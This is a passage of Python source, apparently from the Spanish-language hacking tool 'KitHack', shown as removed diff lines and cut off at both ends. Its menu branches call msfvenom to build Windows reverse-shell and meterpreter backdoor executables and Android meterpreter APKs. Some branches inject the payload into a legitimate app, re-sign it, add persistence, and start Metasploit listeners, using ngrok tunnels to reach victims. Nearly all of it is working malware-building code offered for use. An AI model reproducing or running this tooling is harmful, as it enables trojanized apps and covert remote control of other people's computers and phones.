cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '08': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '09': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '10': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '11': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '12': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/metsvc_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '13': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '14': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p windows/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif sys == '03': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} android/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[02]{1} android/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[03]{1} android/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[04]{1} android/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[05]{1} android/shell/reverse_http'.format(WHITE, YELLOW)) - print ('{0}[06]{1} android/shell/reverse_https'.format(WHITE, YELLOW)) - print ('{0}[07]{1} android/shell/reverse_tcp'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - - elif pay == '02': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https 